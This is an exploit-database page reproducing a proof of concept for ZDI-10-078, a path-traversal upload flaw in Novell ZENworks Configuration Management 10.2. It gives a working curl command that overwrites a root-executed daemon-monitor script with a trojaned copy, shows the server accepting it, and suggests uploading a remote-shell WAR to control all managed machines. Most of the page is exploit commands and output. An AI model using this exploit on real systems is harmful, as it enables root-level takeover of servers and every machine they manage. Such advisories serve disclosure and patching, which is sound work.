Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23729
HistoryApr 30, 2010 - 12:00 a.m.

PoC for ZDI-10-078

2010-04-3000:00:00
vulners.com
40

Exploit Title: ZDI-10-078: NovellZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability

Date: 2009-04-26

Author: tucanalamigo http://tucanalamigo.blogspot.com

Software Link: http://www.novell.com/products/zenworks/configurationmanagement/

Version: 10.2

Tested on: GNU/Linux (SLES11)


PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/


You can overwrite any file owned by zenworks user (nearly all /opt/novell)
such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script
executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root…

$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi

if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi

while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$

You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.

PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):

$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true'
–data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"

  • About to connect() to zcm.server port 80 (#0)
  • Trying 127.11.22.33… connected
  • Connected to zcm.server (127.11.22.33) port 80 (#0)
    > POST /zenworks-fileupload/?type=application/octet-stream/…/…/…/…/…/…/…/opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
    > User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
    > Host: zcm.server
    > Accept: /
    > Content-Type: application/octet-stream
    > Content-Length: 554
    >
    < HTTP/1.1 200 OK
    HTTP/1.1 200 OK
    < Server: Apache-Coyote/1.1
    Server: Apache-Coyote/1.1
    < Content-Length: 0
    Content-Length: 0
    < Date: Mon, 26 Apr 2010 21:58:05 GMT
    Date: Mon, 26 Apr 2010 21:58:05 GMT

<

  • Connection #0 to host zcm.server left intact
  • Closing connection #0
    $


Saludosde #linux, tu canal amigo.